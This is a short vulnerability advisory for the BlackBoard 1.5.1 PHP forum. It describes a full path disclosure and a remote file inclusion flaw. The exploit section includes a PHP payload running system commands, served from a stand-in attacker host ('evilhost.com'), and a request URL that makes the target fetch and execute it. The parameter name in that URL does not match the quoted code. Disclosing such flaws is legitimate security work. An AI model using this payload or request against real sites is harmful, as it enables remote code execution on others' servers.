blackboard.txt

`  
  
Multiple vulnerabilities in BlackBoard  
  
**********************************  
*AuThor:Cracklove *  
*emA!l:Cracklove[at]Gmail[dot]Com*  
*HoMePaGe:http://ProxySky.com *  
**********************************  
  
[Info]  
  
Website: http://blackboard.unclassified.de  
Version: 1.5.1,Maybe prior  
Problem: Full path disclosure,Include file  
  
[Vuls]  
  
1.Full path disclosure:  
  
Let's try to request like this:  
  
http://target/bb_lib/checkdb.inc.php  
  
and we get standard error messages like that:  
  
Warning: main(lang/_more.php): failed to open stream: No such file or directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15  
  
Fatal error: main(): Failed opening required 'lang/_more.php' (include_path='.:/usr/local/lib/php') in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15  
  
The Problem also in admin.inc.php,cp.inc.php etc.  
  
  
2.Include file  
  
Ok let's open ./bb_lib/admin.inc.php,We see  
  
require($libpath . 'lang/' . $LANG . '_more.php');  
  
Bingo!It is include vul!  
  
[Exploit]  
  
For example, if I had access to place files in a webspace http://evilhost.com/,I would create a directory "lang" and place  
inside it a script called _more.php with content like the following:  
  
<?  
system("uname -a;id;ls -al");  
?>  
  
If we then make a request to the target machine like the following:  
  
http://target/bb_lib/checkdb.inc.php?libpach=http://evilhost.com/  
  
The code should be retrieved and executed.  
  
[Fix]  
  
Maybe a patch will release later.  
  
[Greetings]  
  
Greets To Xon,fatb,Envymask,h886,ToToDoDo And to all people in China.  
`